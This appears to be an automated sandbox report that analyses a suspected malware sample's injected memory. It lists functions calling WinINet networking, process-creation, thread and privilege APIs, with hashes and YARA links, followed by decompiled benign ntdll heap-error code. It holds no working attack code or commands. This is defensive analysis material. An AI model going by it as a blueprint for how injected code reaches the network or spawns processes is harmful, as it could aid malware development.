String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: 0e72a21f9efce062a6bca0e304b038246f7da3cc365e92d064075bb8c21f4d51
Instruction ID: 951e36912085ed1e94c4bde78a6de3b2427271fdb47162b059bfa66313d99e87
Opcode Fuzzy Hash: 0e72a21f9efce062a6bca0e304b038246f7da3cc365e92d064075bb8c21f4d51
Instruction Fuzzy Hash: 8001FBB1905119AFCB04DF88D845AAF7BB8EB54210F158148FD586B205D670AA10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00708836, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 50networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 007088A8

Strings

rnetConnectA, xrefs: 0070889E, 007088A6
Inte, xrefs: 0070885A
ConnectA, xrefs: 007088A2, 007088A7
Conn, xrefs: 00708868
InternetConnectA, xrefs: 0070889A, 007088A5
rnet, xrefs: 00708861
ectA, xrefs: 0070886F

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction ID: 5b41265e0d820af9172dc07d4f5697e02096e7e8a6b8f7f0bedeb2e808f3c349
Opcode Fuzzy Hash: c9aa46f1c961d0ac685b8fd51feefcb5bb4134e96ff90580775f2c5bd08472a3
Instruction Fuzzy Hash: 540121B2905158AFCB14DF99D981EEF7BB9FF48350F154248FA48A7341C6309E10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00708840, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 007088A8

Strings

rnetConnectA, xrefs: 0070889E, 007088A6
Inte, xrefs: 0070885A
ConnectA, xrefs: 007088A2, 007088A7
Conn, xrefs: 00708868
InternetConnectA, xrefs: 0070889A, 007088A5
rnet, xrefs: 00708861
ectA, xrefs: 0070886F

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction ID: 5db6483f3f3cb7834d80d57153ee7aa54a8faa2d620b03ebcd273a8a8f6ddfcc
Opcode Fuzzy Hash: 9d030a777e5cccec2ac6e3d13d24fbac149be2e6a7ed5dee5ea452bd7c4c0401
Instruction Fuzzy Hash: A601E9B2915118AFCB14DF99D941EEF77B9EB48310F158289BE48A7241D630EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 007087D0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00708827

Strings

rnet, xrefs: 007087F1
InternetOpenA, xrefs: 0070881D, 00708825
Open, xrefs: 007087F8
A, xrefs: 007087FF
Inte, xrefs: 007087EA
rnetOpenA, xrefs: 00708821, 00708826

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction ID: 1d8aef17d2750c99c5c92a7b13bac75a5cc9cd2f79a5d21813487648c3ec352a
Opcode Fuzzy Hash: 8f93591177d63440a7d4fcc38820cef4d44ce1c8150f9d8762720a548369221d
Instruction Fuzzy Hash: BEF01DB2911118AFCB14DF98DC419FB77B8EF48310B048689BD5897241D634AE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 007087C8, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 40networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00708827

Strings

rnet, xrefs: 007087F1
InternetOpenA, xrefs: 0070881D, 00708825
Open, xrefs: 007087F8
A, xrefs: 007087FF
Inte, xrefs: 007087EA
rnetOpenA, xrefs: 00708821, 00708826

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction ID: ab60c7c48578d211c8ac7596bdb91156bff4b7c9a17b3f5bea08605d102b9890
Opcode Fuzzy Hash: aa3e99256014bda4c9af87b8a30cb13105d69504205f53cfc7184a3d27ad6ac8
Instruction Fuzzy Hash: A5016DB2901129AFCB14DFA8D8859EF7BB9EF48310B048289FD5467241D634AA11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00706ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 00706F78

Strings

wininet.dll, xrefs: 00706F2E, 00706F37
net.dll, xrefs: 00706F41, 00706FC7, 00706F9F, 00706FAB, 00706FD3

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: f72d8c9df9aa06c843a66b7aac908d588720ae5a7d30bfa9bbb2ee071f815be9
Instruction ID: c87fe6ee679b0b7183bd54742e0ceb4644adafd891834ae32b80af5a13725a6a
Opcode Fuzzy Hash: f72d8c9df9aa06c843a66b7aac908d588720ae5a7d30bfa9bbb2ee071f815be9
Instruction Fuzzy Hash: EE31B0B5601705EBC711EF68D8B1FA7B7F8AB48700F00851DF61A9B281D734B855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00706EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 00706F78

Strings

wininet.dll, xrefs: 00706F2E, 00706F37
net.dll, xrefs: 00706F41, 00706F9F, 00706FAB

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 8d31e068d91176d225dc060b023c2e3a2d8d1e744c71c927f01dc9b44e014deb
Instruction ID: 8c6431787f0e9c3f5463bcecf882fc36247b769e01bcf10e182ee3035690bfc6
Opcode Fuzzy Hash: 8d31e068d91176d225dc060b023c2e3a2d8d1e744c71c927f01dc9b44e014deb
Instruction Fuzzy Hash: B831A0B1601305EBD710EF64D8A1FABBBF4AB84704F10821DF6195B282D374A951CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00708447, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00703506,?,00703C7F,00703C7F,?,00703506,?,?,?,?,?,00000000,00000000,?), ref: 007084AD

Strings

hp, xrefs: 0070846C, 00708477

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: hp
API String ID: 1279760036-420480015
Opcode ID: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction ID: d494a2ec9495a55dfba58d109c89504eb37fb85057a328b4b2de3a7e2f1648c5
Opcode Fuzzy Hash: 18e86575d9df3628f782bd7008b084f41119d377f426bfb1cbe0513669106961
Instruction Fuzzy Hash: 1AF04475300215AFD614EF98DC84EE7735DEF88360B108659F9889B241D931E91587E0

Uniqueness

Uniqueness Score: -1.00%

Function 007084B4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006F3B93), ref: 007084ED

Strings

.z`, xrefs: 007084DC, 007084E8

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction ID: 215bbb6c115bd6be7aa131b6ac4aa95dcb7683fa16f9ce43353aea7a72ec7df7
Opcode Fuzzy Hash: 1003aea85140daa6256f232bd95707a379daf1b87b4ad07b3350c04b4954d5c9
Instruction Fuzzy Hash: DEE092B1200704BBDB14DF64CC49EA737ACAF88750F114199FE085B382D531E901CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 007084C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006F3B93), ref: 007084ED

Strings

.z`, xrefs: 007084DC, 007084E8

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a907548652f401874ab5f3aae521df44c2422be05ecd4c0c6f9f9bfe1dfe1540
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 47E01AB1200204ABDB14DF59CC49EA777ACAF88750F014654BA0857381CA30E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 006F7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006F72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006F72DB

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: ff0b76be365e3e0789604f06e9fb755775fd01b8c77a2ac04d00f4312ace3b7f
Instruction ID: 5f38b3345fa0a20ecfacf4f6f99f3364bb293b2178dcdb8cd3bd26017b10fb33
Opcode Fuzzy Hash: ff0b76be365e3e0789604f06e9fb755775fd01b8c77a2ac04d00f4312ace3b7f
Instruction Fuzzy Hash: 7901A731A80328B6E721A6949C03FFE776D5F00B50F144119FF04BA1C2E6946A0647F6

Uniqueness

Uniqueness Score: -1.00%

Function 0070852D, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00708584

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction ID: ed401e92f5375ccd105ade771418c155afdc3b88f2cd30bbc1a13b24332135e3
Opcode Fuzzy Hash: a1612ac63e0905b6c1ed067f8d99531d2630b0d74cedcee3656bc465a2333204
Instruction Fuzzy Hash: AF1105B2200108BBCB44DF98DC84DEB77ADAF8C754F118258FA4DD7381DA34E9118BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00708530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00708584

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5818e92862c54890373b8ed06aed4a725f89c77a0019fce0c247b774389ffaa1
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: B501AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00706FF3, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,006FCCC0,?,?), ref: 0070703C

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction ID: 22632209fc6eec61fb5eb0ace0404a2680d89a6309366a8ddc7a7fdd981c5d16
Opcode Fuzzy Hash: 9a44dde10a67189f5355af6f7bfa10913007d1852b46debec506ea6fc2be7da6
Instruction Fuzzy Hash: 03F06572640210B7D7306658DC43FE77298DB95B50F250119F649AB2C1D9D9B90246E5

Uniqueness

Uniqueness Score: -1.00%

Function 00707000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,006FCCC0,?,?), ref: 0070703C

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: e84105cec029e85349c2898832a320f2226c150e9188ce1b48ec15b3d865a9be
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 3EE09B7338030476D3306599DC03FA773DCCB81B20F150125F60DE71C1D599F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00708480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00703506,?,00703C7F,00703C7F,?,00703506,?,?,?,?,?,00000000,00000000,?), ref: 007084AD

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 46af8c960c0b9522f191dbeb90a19cf6c089bc09b4a8a4e9d0e76751141927d9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1BE012B1200208ABDB14EF99CC45EA777ACAF88650F118658BA085B382CA30F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00708620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,006FCF92,006FCF92,?,00000000,?,?), ref: 00708650

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a8102ffcda7df8ca6e05b7b5d28c3e6f07a6471b9433606617e2113a3c46ebb3
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 60E01AB1200208ABDB10DF49CC85EE737ADAF88650F018154BA0857381C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 006FD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,006F7C63,?), ref: 006FD42B

Memory Dump Source

Source File: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 92deb5595605574c1e49fb26b3275028172ff7a71c7d0a9607f259ac197433f9
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: D6D0A7717903087BE610FAA4DC07F6632CE9B44B04F494064FA48D73C3D964F5004171

Uniqueness

Uniqueness Score: -1.00%

Function 04AF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04AF9694

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: deff02b082587900d6dbd377a735b6ec64f33c47c8cce0b14eea8aa451349d57
Instruction ID: 84cf266713939ff6647a53e347be8f1984587cf8a4e080fc2c90d5c0a2c10f6a
Opcode Fuzzy Hash: deff02b082587900d6dbd377a735b6ec64f33c47c8cce0b14eea8aa451349d57
Instruction Fuzzy Hash: 3CB09BB29014C5C5F751D7E14A087177E04BBD0745F16C055E2030645A4778D091F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B6B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** An Access Violation occurred in %ws:%s, xrefs: 04B6B48F
The resource is owned exclusively by thread %p, xrefs: 04B6B374
This failed because of error %Ix., xrefs: 04B6B446
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04B6B484
*** A stack buffer overrun occurred in %ws:%s, xrefs: 04B6B2F3
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04B6B305
*** enter .exr %p for the exception record, xrefs: 04B6B4F1
read from, xrefs: 04B6B4AD, 04B6B4B2
<unknown>, xrefs: 04B6B27E, 04B6B2D1, 04B6B350, 04B6B399, 04B6B417, 04B6B48E
a NULL pointer, xrefs: 04B6B4E0
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04B6B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 04B6B39B
The instruction at %p tried to %s , xrefs: 04B6B4B6
The critical section is owned by thread %p., xrefs: 04B6B3B9
The instruction at %p referenced memory at %p., xrefs: 04B6B432
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04B6B476
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04B6B47D
*** then kb to get the faulting stack, xrefs: 04B6B51C
an invalid address, %p, xrefs: 04B6B4CF
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04B6B53F
Go determine why that thread has not released the critical section., xrefs: 04B6B3C5
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04B6B38F
*** Resource timeout (%p) in %ws:%s, xrefs: 04B6B352
The resource is owned shared by %d threads, xrefs: 04B6B37E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04B6B3D6
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04B6B323
*** Inpage error in %ws:%s, xrefs: 04B6B418
write to, xrefs: 04B6B4A6
*** enter .cxr %p for the context, xrefs: 04B6B50D
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04B6B2DC

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 4d90f6509b9d308aaffc793c65fe1ba96ed993037bc6efa0b19dba5f7bc8acd0
Instruction ID: 111c908f92343d3b099684438c2c732595ea0e0bf9d8b533ca73c0a097a2190d
Opcode Fuzzy Hash: 4d90f6509b9d308aaffc793c65fe1ba96ed993037bc6efa0b19dba5f7bc8acd0
Instruction Fuzzy Hash: 70811531A44220FFEB316E098C45D7B3B36EF86B55F4040D4F605AB112E369B522EBB2

Uniqueness

Uniqueness Score: -1.00%

Function 04B71C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04B71C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4a948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04ABB150();
				} else {
					E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4ba589c);
				E04ABB150("Heap error detected at %p (heap handle %p)\n",  *0x4ba58a0);
				_t27 =  *0x4ba5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04B71E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04ABB150();
				} else {
					E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04ABB150("Error code: %d - %s\n",  *0x4ba5898);
				_t113 =  *0x4ba58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04ABB150();
					} else {
						E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04ABB150("Parameter1: %p\n",  *0x4ba58a4);
				}
				_t115 =  *0x4ba58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04ABB150();
					} else {
						E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04ABB150("Parameter2: %p\n",  *0x4ba58a8);
				}
				_t117 =  *0x4ba58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04ABB150();
					} else {
						E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04ABB150("Parameter3: %p\n",  *0x4ba58ac);
				}
				_t119 =  *0x4ba58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04ABB150();
					} else {
						E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4ba58b4);
					E04ABB150("Last known valid blocks: before - %p, after - %p\n",  *0x4ba58b0);
				} else {
					_t120 =  *0x4ba58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04ABB150();
				} else {
					E04ABB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04ABB150("Stack trace available at %p\n", 0x4ba58c0);
			}

0x04b71c10
0x04b71c16
0x04b71c1e
0x04b71c3d
0x04b71c3e
0x04b71c20
0x04b71c35
0x04b71c3a
0x04b71c44
0x04b71c55
0x04b71c5a
0x04b71c65
0x04b71c67
0x00000000
0x04b71c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04b71c67
0x04b71cdc
0x04b71ce5
0x04b71d04
0x04b71d05
0x04b71ce7
0x04b71cfc
0x04b71d01
0x04b71d0b
0x04b71d17
0x04b71d1f
0x04b71d25
0x04b71d30
0x04b71d4f
0x04b71d50
0x04b71d32
0x04b71d47
0x04b71d4c
0x04b71d61
0x04b71d67
0x04b71d68
0x04b71d6e
0x04b71d79
0x04b71d98
0x04b71d99
0x04b71d7b
0x04b71d90
0x04b71d95
0x04b71daa
0x04b71db0
0x04b71db1
0x04b71db7
0x04b71dc2
0x04b71de1
0x04b71de2
0x04b71dc4
0x04b71dd9
0x04b71dde
0x04b71df3
0x04b71df9
0x04b71dfa
0x04b71e00
0x04b71e0a
0x04b71e13
0x04b71e32
0x04b71e33
0x04b71e15
0x04b71e2a
0x04b71e2f
0x04b71e39
0x04b71e4a
0x04b71e02
0x04b71e02
0x04b71e08
0x00000000
0x00000000
0x04b71e08
0x04b71e5b
0x04b71e7a
0x04b71e7b
0x04b71e5d
0x04b71e72
0x04b71e77
0x04b71e95

Strings

heap_failure_buffer_overrun, xrefs: 04B71C98
Parameter2: %p, xrefs: 04B71DA5
HEAP: , xrefs: 04B71C16, 04B71C3D, 04B71D04, 04B71D4F, 04B71D98, 04B71DE1, 04B71E32, 04B71E7A
heap_failure_listentry_corruption, xrefs: 04B71CD0
heap_failure_virtual_block_corruption, xrefs: 04B71C91
HEAP[%wZ]: , xrefs: 04B71C30, 04B71CF7, 04B71D42, 04B71D8B, 04B71DD4, 04B71E25, 04B71E6D
heap_failure_freelists_corruption, xrefs: 04B71CC9
Error code: %d - %s, xrefs: 04B71D12
heap_failure_lfh_bitmap_mismatch, xrefs: 04B71CD7
heap_failure_block_not_busy, xrefs: 04B71CA6
heap_failure_cross_heap_operation, xrefs: 04B71CC2
Parameter1: %p, xrefs: 04B71D5C
heap_failure_generic, xrefs: 04B71C7C
heap_failure_usage_after_free, xrefs: 04B71CBB
Stack trace available at %p, xrefs: 04B71E86
heap_failure_unknown, xrefs: 04B71C75
heap_failure_invalid_argument, xrefs: 04B71CAD
Heap error detected at %p (heap handle %p), xrefs: 04B71C50
heap_failure_buffer_underrun, xrefs: 04B71C9F
heap_failure_entry_corruption, xrefs: 04B71C83
